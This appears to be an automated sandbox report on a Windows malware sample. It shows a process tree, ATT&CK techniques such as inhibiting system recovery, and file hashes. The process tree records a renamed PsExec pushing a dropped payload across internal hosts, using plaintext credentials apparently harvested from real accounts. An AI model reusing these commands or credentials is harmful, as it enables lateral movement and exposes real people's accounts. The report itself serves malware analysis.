C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4960

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:2316

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\239.255.255.250 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:5088

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:1580

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4228

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\224.0.0.252 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4600

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.68 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4156

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4668

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4516

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4348

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:3932

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4444

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:1192

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.67 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4876

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.71 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4992

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.1 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
PID:4860

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.95 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:904

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.68 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:4016

C:\Windows\TEMP\_fif.exe
C:\Windows\TEMP\_fif.exe \\10.10.0.95 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_ple.exe"
3⤵
- Modifies data under HKEY_USERS
PID:5100

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:612

C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1856

C:\Windows\_ple.exe
"_ple.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1892

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\notepad.exe"
3⤵
- Drops file in Windows directory
PID:2872

C:\Windows\_ple.exe
"_ple.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:188

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\notepad.exe"
3⤵
- Drops file in Windows directory
PID:2080

C:\Windows\_ple.exe
"_ple.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4344

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\notepad.exe"
3⤵
- Drops file in Windows directory
PID:4364

C:\Windows\_ple.exe
"_ple.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4840

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\notepad.exe"
3⤵
- Drops file in Windows directory
PID:4864

C:\Windows\_ple.exe
"_ple.exe"
2⤵
- Executes dropped EXE
PID:5116

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\system32\notepad.exe"
3⤵
- Drops file in Windows directory
PID:3924

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:264

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:3996

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:2520

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal on Host

T1070

File Deletion

T1107

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\PSEXESVC.exe
MD5
75b55bb34dac9d02740b9ad6b6820360

SHA1
a17c21b909c56d93d978014e63fb06926eaea8e7

SHA256
141b2190f51397dbd0dfde0e3904b264c91b6f81febc823ff0c33da980b69944

SHA512
a5228ccb60d45102beb0be31aa7f6052b0ed9d1da8d69880265c1012e61fd298477a9528c703dafb09060af829a7c59154602fec2cb46ef250411cc703beb7de

Download Submit
C:\Windows\TEMP\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\TEMP\_ple.exe
MD5
ca0eaca077aa67f2609f612cefe7f1f3

SHA1
5e42386540acbb0949b78d5c0e37e0a186ddc18a

SHA256
3e27b6b287f0b9f7e85bfe18901d961110ae969d58b44af15b1d75be749022c2

SHA512
ab1963c8c29f9c16d28a8662227b7404e419ce099e06e3a8f047ac106d8f8f836e8c10a663121ce939ab22b0d4239ae644b226317830d4407dc015a792ad67c9

Download Submit
C:\Windows\TEMP\_umx.exe
MD5
3c0d740347b0362331c882c2dee96dbf

SHA1
8350e06f52e5c660bb416b03edb6a5ddc50c3a59

SHA256
ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85

SHA512
a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f

Download Submit
C:\Windows\TEMP\vfrkl.exe
MD5
86d1a184850859a6a4d1c35982f3c40e

SHA1
4abde6ff4d7f30c60dc61e866c4a11a7eee5bef5

SHA256
eb766983a8a05ad16b15e356df43f4e00f36092b8c6effdff3a580c2de2bba8f

SHA512
e9c18e0a70af00119bef1c697f0a801e9942c4702046d7f20533ea33c987c37c2007066b13935c8df6e039628db885cad2338feb95490e27cdcdbd57a7d0cc1a

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_fif.exe
MD5
27304b246c7d5b4e149124d5f93c5b01

SHA1
e50d9e3bd91908e13a26b3e23edeaf577fb3a095

SHA256
3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef

SHA512
bec172a2f92a95796199cfc83f544a78685b52a94061ce0ffb46b265070ee0bcc018c4f548f56018bf3ff1e74952811b2afb6df79ab8d09f1ec73c9477af636b

Download Submit
C:\Windows\Temp\_umx.exe
MD5
3c0d740347b0362331c882c2dee96dbf

SHA1
8350e06f52e5c660bb416b03edb6a5ddc50c3a59

SHA256
ae9a4e244a9b3c77d489dee8aeaf35a7c3ba31b210e76d81ef2e91790f052c85

SHA512
a701f94b9cdebce6eff2f82552ec7554bf10d99019f8bcd6871ebca804d7519bdcfa3806ac7c7d8e604c3259c61c58b905293fa641c092a8fca8245f91eb0f8f

Download Submit
C:\Windows\Temp\vfrkl.exe
MD5
86d1a184850859a6a4d1c35982f3c40e

SHA1
4abde6ff4d7f30c60dc61e866c4a11a7eee5bef5

SHA256
eb766983a8a05ad16b15e356df43f4e00f36092b8c6effdff3a580c2de2bba8f

SHA512
e9c18e0a70af00119bef1c697f0a801e9942c4702046d7f20533ea33c987c37c2007066b13935c8df6e039628db885cad2338feb95490e27cdcdbd57a7d0cc1a

Download Submit
C:\Windows\_ple.exe
MD5
5de09ff3f2fe37fca81313d0f8afce88

SHA1
13b42d066c94c6bcf50be8f16d7d80b2f9fe47cc

SHA256
ca9979c44fa86aef1813fdac20993c6c6c01ffb7fb72b7cafd9bdbe5d1543fd0

SHA512
894708b67ea74083b705d2149fde35e48c832e9b6770db483ec0ee0cc0b2d387106aa5a4cb01f6bcfdb58907b71351a264e59588239864b1382ba6f2eb7d0595

Download Submit
C:\Windows\_ple.exe
MD5
a61ec9adf13e73763912b08d6cb2a391

SHA1
a1b5b195522b0ee627d854ba5bce18597f28d76c

SHA256
4a7153ad7214bf789730d66fbb36a875adfe409b50c7ec52952617e15f6d9411

SHA512
0532a0d396f7b805f2ee38422110922455cf4bbde3cab0e966b48cceafb0c0c6bc4b6671bb9f8683551a8840e845639d4640b27f04454669f296c67c6d5e8103

Download Submit
C:\Windows\_ple.exe
MD5
459756239d06d6090ceb2aadb92faaec

SHA1
590cb306a318158850b392d239acfc9fd349d0ca

SHA256
35378e1886d50bba7959f4d4e21420ab471d21c136eb68408db0d9907b52bead

SHA512
1f99225ce9f3054c0bad634a8b9cf5b36e53e8df48cb2c0f75d93ba73dd44c28bee0b5a3ddadddbb56a9c954fa04a9704991a7f9ccaad8c2b1e50415c88c313e

Download Submit
C:\Windows\_ple.exe
MD5
9dd1566c7fb0bc9fc7448761083f7a39

SHA1
968da6a61ffb256e64332b5e8778a9a6fd510cc2

SHA256
9abe6f6c29988bd6ae60b40e528f1b632c4dd8e20aa617aaa5feae6e529ba0ae

SHA512
e0e0cc3c2b0e881241f1a912b5f5cc0fb19d4e11059ae30bb41d519a65520e430cb8bb6584a21d8dfbc537a62b9b91fa562c7d3682b616eea77f9747c57da1b0

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\wkssvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\UNC\10.10.0.74\ADMIN$\PSEXESVC.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\UNC\10.10.0.74\ADMIN$\PSEXESVC.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\UNC\Ewycradz\ADMIN$\_ple.exe
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\UNC\Ewycradz\pipe\PSEXESVC
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/188-58-0x0000000000000000-mapping.dmp

Download
memory/200-173-0x0000000000000000-mapping.dmp

Download
memory/212-193-0x0000000000000000-mapping.dmp

Download
memory/252-60-0x0000000000000000-mapping.dmp

Download
memory/412-7-0x0000000000000000-mapping.dmp

Download
memory/496-54-0x0000000000000000-mapping.dmp

Download
memory/892-52-0x0000000000000000-mapping.dmp

Download
memory/904-230-0x0000000000000000-mapping.dmp

Download
memory/1032-118-0x0000000000000000-mapping.dmp

Download
memory/1044-161-0x0000000000000000-mapping.dmp

Download
memory/1168-169-0x0000000000000000-mapping.dmp

Download
memory/1192-226-0x0000000000000000-mapping.dmp

Download
memory/1196-137-0x0000000000000000-mapping.dmp

Download
memory/1376-195-0x0000000000000000-mapping.dmp

Download
memory/1388-166-0x0000000000000000-mapping.dmp

Download
memory/1464-179-0x0000000000000000-mapping.dmp

Download
memory/1516-45-0x0000000000000000-mapping.dmp

Download
memory/1580-217-0x0000000000000000-mapping.dmp

Download
memory/1736-144-0x0000000000000000-mapping.dmp

Download
memory/1740-6-0x0000000000000000-mapping.dmp

Download
memory/1796-210-0x0000000000000000-mapping.dmp

Download
memory/1860-62-0x0000000000000000-mapping.dmp

Download
memory/1888-116-0x0000000000000000-mapping.dmp

Download
memory/1892-30-0x0000000000000000-mapping.dmp

Download
memory/1940-63-0x0000000000000000-mapping.dmp

Download
memory/2080-61-0x0000000000000000-mapping.dmp

Download
memory/2080-68-0x0000000000000000-mapping.dmp

Download
memory/2164-27-0x0000000000000000-mapping.dmp

Download
memory/2164-199-0x0000000000000000-mapping.dmp

Download
memory/2316-215-0x0000000000000000-mapping.dmp

Download
memory/2340-70-0x0000000000000000-mapping.dmp

Download
memory/2600-18-0x0000000000000000-mapping.dmp

Download
memory/2620-159-0x0000000000000000-mapping.dmp

Download
memory/2632-47-0x0000000000000000-mapping.dmp

Download
memory/2672-35-0x0000000000000000-mapping.dmp

Download
memory/2676-197-0x0000000000000000-mapping.dmp

Download
memory/2704-183-0x0000000000000000-mapping.dmp

Download
memory/2872-37-0x0000000000000000-mapping.dmp

Download
memory/2872-34-0x0000000002FF0000-0x0000000002FF2000-memory.dmp

Filesize
8KB

Download
memory/2872-33-0x0000000000000000-mapping.dmp

Download
memory/2916-117-0x0000000000000000-mapping.dmp

Download
memory/3060-22-0x0000000000000000-mapping.dmp

Download
memory/3120-48-0x0000000000000000-mapping.dmp

Download
memory/3208-5-0x0000000000000000-mapping.dmp

Download
memory/3212-39-0x0000000000000000-mapping.dmp

Download
memory/3216-153-0x0000000000000000-mapping.dmp

Download
memory/3236-41-0x0000000000000000-mapping.dmp

Download
memory/3288-4-0x0000000000000000-mapping.dmp

Download
memory/3408-168-0x0000000000000000-mapping.dmp

Download
memory/3428-10-0x0000000000000000-mapping.dmp

Download
memory/3568-29-0x0000000000000000-mapping.dmp

Download
memory/3672-198-0x0000000000000000-mapping.dmp

Download
memory/3732-51-0x0000000000000000-mapping.dmp

Download
memory/3796-139-0x0000000000000000-mapping.dmp

Download
memory/3820-57-0x0000000000000000-mapping.dmp

Download
memory/3908-17-0x0000000000000000-mapping.dmp

Download
memory/3924-114-0x0000000000000000-mapping.dmp

Download
memory/3924-111-0x0000000000000000-mapping.dmp

Download
memory/3932-224-0x0000000000000000-mapping.dmp

Download
memory/3980-13-0x0000000000000000-mapping.dmp

Download
memory/3988-3-0x0000000000000000-mapping.dmp

Download
memory/3996-184-0x0000000000000000-mapping.dmp

Download
memory/4000-14-0x0000000000000000-mapping.dmp

Download
memory/4004-2-0x0000000000000000-mapping.dmp

Download
memory/4016-231-0x0000000000000000-mapping.dmp

Download
memory/4056-122-0x0000000000000000-mapping.dmp

Download
memory/4088-15-0x0000000000000000-mapping.dmp

Download
memory/4108-181-0x0000000000000000-mapping.dmp

Download
memory/4116-203-0x0000000000000000-mapping.dmp

Download
memory/4116-69-0x0000000000000000-mapping.dmp

Download
memory/4148-213-0x0000000000000000-mapping.dmp

Download
memory/4152-115-0x0000000000000000-mapping.dmp

Download
memory/4156-220-0x0000000000000000-mapping.dmp

Download
memory/4160-141-0x0000000000000000-mapping.dmp

Download
memory/4164-146-0x0000000000000000-mapping.dmp

Download
memory/4172-182-0x0000000000000000-mapping.dmp

Download
memory/4176-123-0x0000000000000000-mapping.dmp

Download
memory/4196-74-0x0000000000000000-mapping.dmp

Download
memory/4200-142-0x0000000000000000-mapping.dmp

Download
memory/4208-73-0x0000000000000000-mapping.dmp

Download
